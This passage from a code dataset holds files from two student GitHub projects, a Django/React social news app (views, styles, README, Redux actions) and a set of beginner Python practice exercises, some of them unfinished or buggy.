user.set_password(validated_data['password'])\n # user.save()\n # profile = Profile.objects.create(\n # user=user,\n # bio='bio',\n # image='not_set'\n # )\n # profile.save()\n\n # return user\n"
},
{
"alpha_fraction": 0.7336342930793762,
"alphanum_fraction": 0.7343867421150208,
"avg_line_length": 30.64285659790039,
"blob_id": "4f96c5d9e48e20059bc61c7230a5671287560b12",
"content_id": "c1ca59caf3597eff787ba9bf8179fa1f1f89c7ce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2658,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 84,
"path": "/jango/api/views.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Post,PostReaction,SavedPost, Comment,Profile\nfrom .serializers import PostSerializer,PostReactionSerializer, SavedPostSerializer, UserSerializer,CommentSerializer, ProfileSerializer\n\nfrom django.contrib.auth.models import User\nfrom rest_framework import status, viewsets\nfrom django.http import JsonResponse\n# import django_filters.rest_framework\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django.contrib.auth.models import User\n# Create your views here.\n\n\nclass PostViewSet(viewsets.ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','title','category')\n\n\nclass ProfileViewSet(viewsets.ModelViewSet):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','user')\n\nclass CommentViewSet(viewsets.ModelViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','user','post')\n\nclass PostReactionViewSet(viewsets.ModelViewSet):\n queryset = PostReaction.objects.all()\n serializer_class = PostReactionSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('post','user','reaction_type')\n\nclass SavedPostViewSet(viewsets.ModelViewSet):\n queryset = SavedPost.objects.all()\n serializer_class = SavedPostSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id', 'user')\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','username','first_name','last_name','email')\n \ndef Login(request):\n method = request.method\n if (method == 'POST'):\n return JsonResponse({'success': \"\"})\n else:\n return JsonResponse({'error': \"This request only handles post request\"})\n\n\ndef Signup(request):\n method = request.method\n if (method == 'POST'):\n # try:\n user = User.objects.create(\n username=request.POST['username'],\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n email=request.POST['email'],\n )\n\n user.set_password(user['password'])\n user.save()\n return JsonResponse({'password': user['email']})\n # except:\n # return JsonResponse({'error': 'Something went wrong'})\n else:\n return JsonResponse({'error': \"This request only handles post request\"})\n\n\ndef RequestPasswordResetToken(request):\n return 3\n\n\ndef ResetPassword(request):\n return 4\n"
},
{
"alpha_fraction": 0.4632086753845215,
"alphanum_fraction": 0.508142352104187,
"avg_line_length": 16.4526309967041,
"blob_id": "16696f210d68b5868d5e7b0963ae7c5333fef852",
"content_id": "6c41cb16c74bd2d988567430a5d842715ba89427",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3316,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 190,
"path": "/app/global-styles.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import { createGlobalStyle } from 'styled-components';\n\nconst GlobalStyle = createGlobalStyle`\n html,\n body {\n height: 100%;\n width: 100%;\n background-color: #fafafa;\n }\n\n body {\n font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;\n }\n\n body.fontLoaded {\n font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;\n }\n\n #app {\n background-color: #fafafa;\n min-height: 100vh;\n min-width: 100%;\n }\n .container{\n width:85%;\n margin: 30px auto;\n }\n .bg-white{\n background: white;\n padding:20px;\n }\n .danger-btn{\n background:red;\n color:white;\n margin-top:20px;\n border-color:red;\n }\n textarea{\n border: 1px solid #eee;\n width: 100%;\n padding: 8px\n }\n .danger-btn{\n background:red;\n color:white;\n margin-top:20px;\n }\n p { \n color: #999\n }\n .comments{\n text-align:left;\n p{\n color: #555;\n margin: 15px 0 !important;\n }\n }\n .logo{\n float:left;\n color:#555;\n font-weight:bold;\n padding-left:20px;\n }\n .ant-alert{\n margin-bottom: 30px;\n }\n .content{\n margin: 24px 16px;\n padding: 24px;\n background: #fff;\n }\n .btn-success{\n background:#4CAF50;\n border-color: #4CAF50;\n :hover,:focus{\n background:#449d48;\n border-color: #449d48;\n \n }\n }\n /* Header */\n .sidebar .logo {\n text-align:center;\n img{\n width:50%;\n margin-bottom:30px;\n }\n }\n /* Login Page */\n .wrapper{\n text-align:center;\n padding-top:100px;\n .logo{\n margin:30px auto;\n font-size:50px;\n }\n h3{\n font-size:20px;\n }\n .login-form {\n max-width: 100%;\n margin-top:30px;\n input{\n background:transparent;\n :hover, :focus{\n border:1px solid #ccc7c7 !important;\n box-shadow:none;\n }\n }\n .login-form-forgot {\n text-align: right;\n margin-top:10px;\n }\n .go-back {\n text-align: left;\n margin-top:10px;\n }\n .login-form-button {\n width: 100%;\n .anticon svg{\n margin-top:-8px;\n margin-left:10px;\n color:white;\n }\n }\n .signup-btn{\n margin-top:25px;\n }\n .signup{\n margin-top:30px;\n }\n .content-divider {\n text-align: center;\n display:block;\n position: relative;\n z-index: 1;\n span {\n background-color: #eeeded;\n display: inline-block;\n padding: 1px 16px;\n line-height:18px;\n color: #999999;\n :before{\n content: \"\";\n position: absolute;\n top: 50%;\n left: 0;\n height: 1px;\n background-color: #ddd;\n width: 100%;\n z-index: -1;\n }\n }\n } \n }\n }\n /* News page */\n\n .avatar-uploader {\n .ant-upload{\n border-radius:50%;\n margin:auto auto 10px auto;\n i{\n font-size:25px;\n }\n }\n .ant-upload {\n width: 128px;\n height: 128px;\n }\n img{\n width: 128px;\n height: 128px;\n border-radius:50%;\n }\n }\n .news-box{\n margin-bottom: 50px ;\n\n }\n footer{\n background: #fff;\n color: #8c8c8c;\n text-align: center;\n padding: 20px 0;\n }\n \n`;\n\nexport default GlobalStyle;\n"
},
{
"alpha_fraction": 0.7586206793785095,
"alphanum_fraction": 0.7758620977401733,
"avg_line_length": 28,
"blob_id": "7f00ca4d30c293dc19a1637da6fe78dc7a431a3a",
"content_id": "7a1cd1f834402f519843b28925fb6afac6cf624c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 348,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 12,
"path": "/README.md",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "BACKEND COMMANDS\n\nFiltering: `pip install django-filter==2.0` must install\nStart server: `manage.py runserver`\nMigrate: `manage.py migrate`\nStart Migrations: `manage.py makemigrations`\nIn case of database re migrate: `manage.py migrate --run-syncdb`\n\nFRONTEND\nInstall dependencies: `npm install`\nRun server: `npm run`\nopen on port `localhost:3000`\n"
},
{
"alpha_fraction": 0.6158273220062256,
"alphanum_fraction": 0.6158273220062256,
"avg_line_length": 12.899999618530273,
"blob_id": "9be96b1303911ee475022c75d6b92acba98ac5b9",
"content_id": "f8a5fec8ec8c7ba71910474f0a425a53128888ab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 695,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 50,
"path": "/app/containers/NewsPage/actions.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "/*\n *\n * NewsPage actions\n *\n */\n\nimport * as c from './constants';\n\nexport function defaultAction() {\n return {\n type: c.DEFAULT_ACTION,\n };\n}\nexport function fetchPosts(id) {\n return {\n type: c.FETCH_POSTS,\n id,\n };\n}\n\nexport function updateProfile(payload) {\n return {\n type: c.UPDATE_PROFILE,\n payload,\n };\n}\nexport function fetchProfile(payload) {\n return {\n type: c.FETCH_PROFILE,\n payload,\n };\n}\nexport function setProfile(payload) {\n return {\n type: c.SET_PROFILE,\n payload,\n };\n}\n\nexport function setPosts(payload) {\n return {\n type: c.SET_POSTS,\n payload,\n };\n}\nexport function unmountRedux() {\n return {\n type: c.UNMOUNT_REDUX,\n };\n}\n"
}
] | 14 |
chleulau/MMRAlgorithm
|
https://github.com/chleulau/MMRAlgorithm
|
77393c20b2a058cddd40e432e2fb469de5eafc3d
|
0c635f77a2de78b1790a017629ab3bbc891dbded
|
771bf2fdcd04e7dac6ad612690f74ffd90b47c7f
|
refs/heads/master
| 2020-06-19T22:15:13.262072 | 2019-07-14T23:49:44 | 2019-07-14T23:49:44 | 196,894,133 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5088598132133484,
"alphanum_fraction": 0.5562403798103333,
"avg_line_length": 29.904762268066406,
"blob_id": "7e5a13e07f78bb77a16f230612c487299d6a9f46",
"content_id": "76b9514cd15e49ab387def8ce65e9ba80111ed80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2596,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 84,
"path": "/stester.py",
"repo_name": "chleulau/MMRAlgorithm",
"src_encoding": "UTF-8",
"text": "import gambit\nimport os\nfrom cvxopt import matrix, solvers\n\ndef cvxtest(arr, numv):\n\tc = matrix(([0.0] * numv) + [-1])\n\tk = [[-arr[0][cvxi], -arr[1][cvxi]] for cvxi in xrange(len(arr[0]))]\n\tfor cvxi in xrange(len(arr[0])):\n\t\tk[cvxi].extend([-int(cvxi == cvxj) for cvxj in xrange(numv)])\n\tk.append([1, 1] + ([0] * numv))\n\tG = matrix([[float(i) for i in k1] for k1 in k])\n\th = matrix(([0.0] * len(k[0])))\n\tA = matrix([[1.0] for cvxj in xrange(numv)] + [[0.0]])\n\tb = matrix([1.0])\n\tsol = solvers.lp(c, G, h, A, b)\n\treturn [float(xi) for xi in sol['x']][:-1]\n\ndef prob(a, numa, numb):\n\tp1 = [sum(a[i:i + numb]) for i in xrange(0, len(a), numb)]\n\tp2 = []\n\tfor i in xrange(numb):\n\t\ts, si = 0, i\n\t\twhile si < len(a):\n\t\t\ts = s + a[si]\n\t\t\tsi = si + numb\n\t\tp2.append(s)\n\treturn [i / sum(p1) for i in p1], [i / sum(p2) for i in p2]\n\ndef epayof(a, ki, kj):\n\tlki, lkj, e, e1 = len(ki), len(kj), 0, 0\n\tfor i in xrange(len(a[0])):\n\t\te = e + (a[0][i] * ki[i / lkj] * kj[i % lkj])\n\tfor i in xrange(len(a[1])):\n\t\te1 = e1 + (a[1][i] * ki[i / lkj] * kj[i % lkj]) \n\treturn e, e1\n\ndef comppay(a, sc1, sc2):\n\tk = cvxtest(a1, au * au)\n\tki, kj = prob(k, au, au)\n\tei1, ej1 = epayof(a1, ki, kj)\n\treturn ei1, ej1\n\n#Set variable actions and general game command s\nsgame = 'java -jar gamut.jar -output GambitOutput -normalize -min_payoff 0 -max_payoff 1 -g '\nactions = [30, 40, 60]\ng1 = open('output.txt', 'w')\nfor au in actions:\n\tly = []\n\t#Generate RandomGame (Games 001 - 100)\n\tfor i in xrange(1, 31):\n\t\t#Generate the game file to grab data from, grab the data, close the file\n\t\tt = ('0' * (3 - len(str(i)))) + str(i)\n\t\tos.system(sgame + 'RandomGame -players 2 -actions ' + str(au) + ' -f ' + t + '.nfg >/dev/null 2>&1')\n\t\tg = gambit.Game.read_game(t + '.nfg')\n\t\n\t\t#Put data into payoff matrices\n\t\tgamenum = i\n\t\ta1 = [[], []]\n\t\tfor profile in g.contingencies:\n\t\t\ta1[0].append(float(g[profile][0]))\n\t\t\ta1[1].append(float(g[profile][1]))\n\t\tr = list(gambit.nash.lcp_solve(g, use_strategic=True, rational=False, stop_after=1)[0])\n\t\tr = [r[:au], r[au:]]\n\t\tei, ej = epayof(a1, r[0], r[1])\n\t\tk = cvxtest(a1, au * au)\n\t\tki, kj = prob(k, au, au)\n\t\tei1, ej1 = epayof(a1, ki, kj)\n\t\tvi1 = int(ei1 >= ei)\n\t\tvi2 = int(ej1 >= ej)\n\t\tif (vi1 + vi2) >= 1:\n\t\t\tij = int(ei1 >= ej1)\n\t\t\tfor scal in xrange(100):\n\t\t\t\tvij = []\n\t\t\t\tvij[ij] = .5 - (scal / 200.0)\n\t\t\t\tvij[(ij + 1) % 2] = .5 + (scal / 200.0)\n\t\t\t\tvei, vej = comppay(a, vij[0], vij[1])\n\t\t\t\tif abs(vei - vej) < .00001:\n\t\t\t\t\tly.append('(' + str(vei) + ',' + str(vej) + ')' + '\\n')\n\t\t\t\t\tbreak\n\tg1.write('Action:' + str(au) + '\\n')\n\tfor lyi in ly:\n\t\tg1.write(lyi)\n\tg1.write('\\n')\ng1.close()\n"
},
{
"alpha_fraction": 0.5331905484199524,
"alphanum_fraction": 0.5735189318656921,
"avg_line_length": 34.025001525878906,
"blob_id": "cfea14582b75bed7f824391f1cebdfea31c564d6",
"content_id": "b23846c33a4828ddaa4ae57d4b7aa40cf303579f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2802,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 80,
"path": "/MMRComparison.py",
"repo_name": "chleulau/MMRAlgorithm",
"src_encoding": "UTF-8",
"text": "import gambit\nimport os\nfrom cvxopt import matrix, solvers\n\ndef cvxtest(arr, numv):\n\tc = matrix(([0.0] * numv) + [-1])\n\tk = [[-arr[0][cvxi], -arr[1][cvxi]] for cvxi in xrange(len(arr[0]))]\n\tfor cvxi in xrange(len(arr[0])):\n\t\tk[cvxi].extend([-int(cvxi == cvxj) for cvxj in xrange(numv)])\n\tk.append([1, 1] + ([0] * numv))\n\tG = matrix([[float(i) for i in k1] for k1 in k])\n\th = matrix(([0.0] * len(k[0])))\n\tA = matrix([[1.0] for cvxj in xrange(numv)] + [[0.0]])\n\tb = matrix([1.0])\n\tsol = solvers.lp(c, G, h, A, b)\n\treturn [float(xi) for xi in sol['x']][:-1]\n\ndef prob(a, numa, numb):\n\tp1 = [sum(a[i:i + numb]) for i in xrange(0, len(a), numb)]\n\tp2 = []\n\tfor i in xrange(numb):\n\t\ts, si = 0, i\n\t\twhile si < len(a):\n\t\t\ts = s + a[si]\n\t\t\tsi = si + numb\n\t\tp2.append(s)\n\treturn [i / sum(p1) for i in p1], [i / sum(p2) for i in p2]\n\ndef epayof(a, ki, kj):\n\tlki, lkj, e, e1 = len(ki), len(kj), 0, 0\n\tfor i in xrange(len(a[0])):\n\t\te = e + (a[0][i] * ki[i / lkj] * kj[i % lkj])\n\tfor i in xrange(len(a[1])):\n\t\te1 = e1 + (a[1][i] * ki[i / lkj] * kj[i % lkj]) \n\treturn e, e1\n\n#Set variable actions and general game command s\nsgame = 'java -jar gamut.jar -output GambitOutput -normalize -min_payoff 1 -max_payoff 1000 -g '\nactions = [2, 10, 20, 30, 40, 60]\ng1 = open('output.txt', 'w')\nfor au in actions:\n\tasw, bet, tg, werr, berr = 0, 0, 0, [], []\n\t#Generate RandomGame (Games 001 - 100)\n\tfor i in xrange(1, 31):\n\t\t#Generate the game file to grab data from, grab the data, close the file\n\t\tt = ('0' * (3 - len(str(i)))) + str(i)\n\t\tos.system(sgame + 'RandomGame -players 2 -actions ' + str(au) + ' -f ' + t + '.nfg >/dev/null 2>&1')\n\t\tg = gambit.Game.read_game(t + '.nfg')\n\t\n\t\t#Put data into payoff matrices\n\t\tgamenum = i\n\t\ta1 = [[], []]\n\t\tfor profile in g.contingencies:\n\t\t\ta1[0].append(float(g[profile][0]))\n\t\t\ta1[1].append(float(g[profile][1]))\n\t\tr = list(gambit.nash.lcp_solve(g, use_strategic=True, rational=False)[0])\n\t\tr = [r[:au], r[au:]]\n\t\tei, ej = epayof(a1, r[0], r[1])\n\t\tk = cvxtest(a1, au * au)\n\t\tki, kj = prob(k, au, au)\n\t\tei1, ej1 = epayof(a1, ki, kj)\n\t\tvi1 = int(ei1 >= ei)\n\t\tif ei1 >= ei:\n\t\t\tberr.append(abs((ei1 - ei) / ei))\n\t\telse:\n\t\t\twerr.append(abs((ei1 - ei) / ei))\n\t\tvi2 = int(ej1 >= ej)\n\t\tif ej1 >= ej:\n\t\t\tberr.append(abs((ej1 - ej) / ej))\n\t\telse:\n\t\t\twerr.append(abs((ej1 - ej) / ej))\t\n\t\tasw = asw + int((vi1 + vi2) >= 1)\n\t\tbet = bet + int((vi1 + vi2) == 2)\n\tg1.write('Action:' + str(au) + '\\n')\n\tg1.write('Num of games where MM do as well or better than LH:' + str(asw) + '\\n')\n\tg1.write('Num of games where MM do strictly better than LH:' + str(bet) + '\\n')\n\tg1.write('Mean relative error when MM does better than LH:' + str(sum(berr) / float(len(berr))) + '\\n')\n\tg1.write('Mean relative error when MM does worse than LH:' + str(sum(werr) / float(len(werr))) + '\\n')\n\tg1.write('\\n')\ng1.close()\n"
}
] | 2 |
austinv11/ByteDiagrams
|
https://github.com/austinv11/ByteDiagrams
|
26a70fbb271b00ffcc8355bc7349a219fe0b4550
|
3e0e70ab353ef069ea48c6bae3ec48d76aa6586d
|
dbe7718c85e23879c8811e9539ef3bf5986e1d54
|
refs/heads/master
| 2020-04-04T09:14:09.180461 | 2018-12-16T21:13:38 | 2018-12-16T21:13:38 | 155,812,273 | 4 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5979381203651428,
"alphanum_fraction": 0.6288659572601318,
"avg_line_length": 19.714284896850586,
"blob_id": "a6349573297e53734d3d809a073412b43f8b520e",
"content_id": "e46a16dab48e2581de06c159181fc74b715c4347",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 14,
"path": "/example.py",
"repo_name": "austinv11/ByteDiagrams",
"src_encoding": "UTF-8",
"text": "\ndef test():\n from diagram import ByteDiagram as d\n\n di = d()\n di.add_label(\"head\", 3).add_label(\"metadata\", 6).add_label(\"payload\", 26)\n print(di.total_byte_length())\n print(di.export_diagram(35)[0])\n\n return di.export_diagram(35)\n\n\"\"\"\nfrom example import test\ntest()\n\"\"\"\n"
},
{
"alpha_fraction": 0.43743783235549927,
"alphanum_fraction": 0.4465884268283844,
"avg_line_length": 37.08333206176758,
"blob_id": "094d3381327da5415a36ce4b0d794970adcacd23",
"content_id": "cc2c44c3dac4ab49a02e06bbee468cfb65a33c51",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5049,
"license_type": "permissive",
"max_line_length": 177,
"num_lines": 132,
"path": "/diagram.py",
"repo_name": "austinv11/ByteDiagrams",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\nfrom typing import List\n\nsymbols = dict(\n se='┌', swe='┬', sw='┐',\n nse='├', nswe='┼', nsw='┤',\n ne='└', nwe='┴', nw='┘',\n ns='│', we='─',\n)\n\nBytesLabel = namedtuple(\"BytesLabel\", [\"length\", \"text\"])\n\n\nclass ByteDiagram:\n\n def __init__(self, labels=[]):\n self.labels = list(labels)\n\n def add_label(self, text: str, length: int) -> \"ByteDiagram\":\n self.labels.append(BytesLabel(length, text))\n return self\n\n def total_byte_length(self) -> int:\n return sum([x.length for x in self.labels])\n\n def export_diagram(self, bytes_per_line: int, offset: int = 0,\n byte_num_offset: int = 0) -> List[str]: # Second row of vars are for internal use only \n assert bytes_per_line < 1000\n\n total_len = self.total_byte_length()\n if total_len <= bytes_per_line:\n bytes_per_line = total_len\n\n # Top of table\n block = symbols['se'] + ((total_len-1) * (symbols['we'] + symbols['swe'])) + symbols['we'] + symbols['sw'] + \"\\n\"\n\n # Header labels\n if bytes_per_line > 100:\n for i in range(bytes_per_line):\n j = i + byte_num_offset\n if j % 100 == 0:\n block += symbols['ns'] + str((j // 100) % 10)\n else:\n block += (symbols['ns'] if i == 0 else \" \")\n block += \" \"\n block += symbols['ns'] + \"\\n\"\n\n if bytes_per_line > 10:\n for i in range(bytes_per_line):\n j = i + byte_num_offset\n if j % 10 == 0:\n block += symbols['ns'] + str((j // 10) % 10)\n else:\n block += (symbols['ns'] if i == 0 else \" \")\n block += \" \"\n block += symbols['ns'] + \"\\n\"\n\n block += symbols['ns']\n for i in range(bytes_per_line):\n j = i + byte_num_offset\n block += str(j % 10) + symbols['ns']\n block += \"\\n\"\n\n chunk_lengths = list([x.length for x in self.labels])\n\n # Header underline\n block += symbols['nse']\n for l in chunk_lengths:\n for i in range(l):\n block += symbols['we']\n block += symbols['nswe'] if i == l - 1 else symbols['nwe']\n block = block[:len(block) - 1] + symbols['nsw'] + \"\\n\"\n\n # Text boxes\n has_remaining = True\n line = 0\n while has_remaining:\n any_remaining = False\n for chunk in self.labels:\n curr_frag = chunk.text\n frag_len = chunk.length + chunk.length - 1\n pointer = line * frag_len\n if len(curr_frag) < pointer:\n block += symbols['ns']\n block += frag_len * \" \"\n else:\n last_index = min(len(curr_frag), pointer + frag_len)\n curr_frag = curr_frag[pointer:last_index]\n padding = \" \" * (frag_len - len(curr_frag))\n block += symbols['ns'] + curr_frag + padding\n if last_index < len(chunk.text):\n any_remaining = True\n line += 1\n block += symbols['ns'] + \"\\n\"\n if not any_remaining:\n has_remaining = False\n\n # Bottom of table\n block += symbols['ne']\n for l in chunk_lengths:\n for i in range(l):\n block += symbols['we']\n block += symbols['nwe'] if i == l - 1 else symbols['we']\n block = block[:len(block) - 1] + symbols['nw']\n\n return [block]\n else:\n for chunk in self.labels:\n assert chunk.length <= bytes_per_line\n\n blocks = list()\n count = 0\n offset = 0\n curr_accumulation = list()\n iterations = 0\n for chunk in self.labels:\n if count + chunk.length <= bytes_per_line:\n curr_accumulation.append(chunk)\n count += chunk.length\n offset += chunk.length\n else:\n blocks.append(ByteDiagram(curr_accumulation).export_diagram(bytes_per_line, offset, bytes_per_line * iterations)[0])\n curr_accumulation.clear()\n count = chunk.length\n offset += chunk.length\n curr_accumulation.append(chunk)\n iterations += 1\n\n if len(curr_accumulation) > 0:\n blocks.append(ByteDiagram(curr_accumulation).export_diagram(bytes_per_line, offset - sum([x.length for x in curr_accumulation]), bytes_per_line * iterations)[0])\n\n return blocks\n"
}
] | 2 |
BrodyJorgensen/practicles
|
https://github.com/BrodyJorgensen/practicles
|
a5c2eb955db3c9a69b5cb5a3b5a645512954324a
|
01c74bba6cdaeb306c0a7bf5d35c5d01dda443ef
|
0280d50a488cf64e6bb14c7b6c16b1e73671f072
|
refs/heads/master
| 2020-07-01T10:31:31.686387 | 2019-10-10T01:03:37 | 2019-10-10T01:03:37 | 201,147,565 | 0 | 0 | null | 2019-08-08T00:26:53 | 2019-09-12T01:41:35 | 2019-09-12T02:11:37 |
Python
|
[
{
"alpha_fraction": 0.665354311466217,
"alphanum_fraction": 0.6811023354530334,
"avg_line_length": 62.75,
"blob_id": "73e342482897520510ab6d7543328ad5b7d26c45",
"content_id": "d581f47e7fbef5f59ad5148cfb83ac95ff8fd32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 4,
"path": "/prac_1/electricity_bill_estimator.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "cent_per_KWH = int(input(\"how much doe it cost \"))\ndaily_usage = float(input(\"what is the daily usage \"))\nnumber_of_days = int(input(\"how many days is it used \"))\nprint(\"estinated bill: ${:.2f}\".format((cent_per_KWH /100) * daily_usage * number_of_days))"
},
{
"alpha_fraction": 0.6578431129455566,
"alphanum_fraction": 0.6647058725357056,
"avg_line_length": 26.567567825317383,
"blob_id": "fc354b4fc0646b01dacf0654c4d4a3a2d12eeede",
"content_id": "21d773fe1c7b7441363fb227bd1ff4a1ae115d0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1020,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 37,
"path": "/prac_7/convert_m_km.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.properties import StringProperty\n\nMILES_TO_KM = 1.60934\n\n\nclass MilesConverterApp(App):\n output_km = StringProperty()\n\n def build(self):\n self.title = \"Convert Miles to Kilometres\"\n self.root = Builder.load_file('convert_m_km.kv')\n return self.root\n\n def handle_calculate(self, number):\n miles = self.convert_to_number(self.number)\n self.update_result(miles)\n return number\n\n def handle_increment(self, number, change):\n miles = self.convert_to_number(self.number) + change\n self.root.ids.input_miles.text = str(miles)\n # Since the InputText.text has changed, its on_text event will fire and handle_calculate will be called\n\n def update_result(self, miles):\n self.output_km = str(miles * MILES_TO_KM)\n\n def convert_to_number(self.number):\n try:\n value = float(number)\n return value\n except ValueError:\n return 0\n\n\nMilesConverterApp().run()\n"
},
{
"alpha_fraction": 0.6597353219985962,
"alphanum_fraction": 0.6635160446166992,
"avg_line_length": 32.0625,
"blob_id": "fbc20175374f06d95be5808f3500f431cb5df391",
"content_id": "28aacc528d2460bceed7a76caffa2a3ae122e906",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/prac4/scores.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "scores_file = open(\"scores.csv\")\nscores_data = scores_file.readlines()\nprint(scores_data)\nsubjects = scores_data[0].strip().split(\",\")\nscore_values = []\nfor score_line in scores_data[1:]:\n score_strings = score_line.strip().split(\",\")\n score_numbers = [int(value) for value in score_strings]\n score_values.append(score_numbers)\nscores_file.close()\nfor i in range(len(subjects)):\n print(subjects[i], \"Scores:\")\n for score in score_values[i]:\n print(score)\n print(\"Max:\", max(score_values[i]))\n print()\n"
},
{
"alpha_fraction": 0.5874999761581421,
"alphanum_fraction": 0.6354166865348816,
"avg_line_length": 21.904762268066406,
"blob_id": "db273d324cceae6725e9b753373f78d5d9ea007d",
"content_id": "82e1da5204a543cc2d1a31679f3cdc48430a23ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 480,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 21,
"path": "/prac_1/loops.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "#for the odd numbers\n#for i in range(1, 21, 2):\n# print(i)\n\n#count to 100 in lots of 10\n#for i in range(0, 101, 10):\n# print(i)\n\n#to ocunt down from 20\n#for i in range(20, 0, -1):\n# print(i)\n\n#printing different numbers of stars\n#number_of_stars = int(input(\"Number of stars: \"))\n#for i in range (number_of_stars):\n# print('*')\n\n#increasing stars being printed\nnumber_of_stars = int(input(\"Number of stars: \"))\nfor i in range(1, number_of_stars + 1):\n print('*' *i)"
},
{
"alpha_fraction": 0.6124293804168701,
"alphanum_fraction": 0.6259887218475342,
"avg_line_length": 31.77777862548828,
"blob_id": "c206c1ce0a5b9acb2ff5c6be0d5e24ced63da8bc",
"content_id": "6d3664e3322e1b10bffbbb381cab1422d39d6116",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 27,
"path": "/prac_6/programming_language.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "class ProgrammingLanguage:\n\n def __init__(self, name, type, reflection, year):\n self.name = name\n self.type = type\n self.reflection = reflection\n self.year = year\n\n def __str__(self):\n return \"{}, {} Type, Reflection={}, Year={}\".format(self.name, self.type, self.reflection, self.year)\n\n def is_dynamic(self):\n return self.type == \"dynamic\"\n\n# testing if the language is dynamic\n# def testing(self):\n# ruby = ProgrammingLanguage(\"Ruby\", \"dynamic\", True, 1995)\n# python = ProgrammingLanguage(\"Python\", \"Dynamic\", True, 1991)\n# visual_basic = ProgrammingLanguage(\"Visual Basic\", \"static\", False, 1991)\n\n# languages = [ruby, python, visual_basic]\n# print(python)\n\n# print(\"The dynamically typ of languages are: \")\n# for language in languages:\n# if language.is_dynamic():\n# print(language.name)\n"
},
{
"alpha_fraction": 0.5037878751754761,
"alphanum_fraction": 0.5113636255264282,
"avg_line_length": 33.456520080566406,
"blob_id": "195f2e864c61f3e9ebe9f29ae2c28ef94b37f94a",
"content_id": "c7ec1fad8b4157988a15b938b778f54313a15647",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1584,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 46,
"path": "/prac_6/car_simulator.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "from prac_6.car import Car\n\nMENU = \"Menu:\\nd) drive\\nr) refuel\\nq) quit\"\n\n\ndef main():\n \"\"\"Car simulator program, demonstrating use of Car class.\"\"\"\n print(\"Let's drive!\")\n name = input(\"Enter your car name: \")\n # create a Car instance with initial fuel of 100 and user-provided name\n car = Car(type, 100)\n print(car)\n print(MENU)\n choice = input(\"Enter your choice: \").lower()\n while choice != \"q\":\n if choice == \"d\":\n distance_to_drive = int(\n input(\"How far do you want to go? \"))\n while distance_to_drive < 0:\n print(\"Distance must be >= 0\")\n distance_to_drive = int(\n input(\"How far do you want to go? \"))\n distance_driven = car.drive(distance_to_drive)\n print(\"The car has driven {}km\".format(distance_driven), end=\"\")\n if car.fuel == 0:\n print(\" out of fuel\", end=\"\")\n print(\".\")\n elif choice == \"r\":\n fuel_to_add = int(input(\n \"How much fule are you putting in? \"))\n while fuel_to_add < 0:\n print(\"Fuel 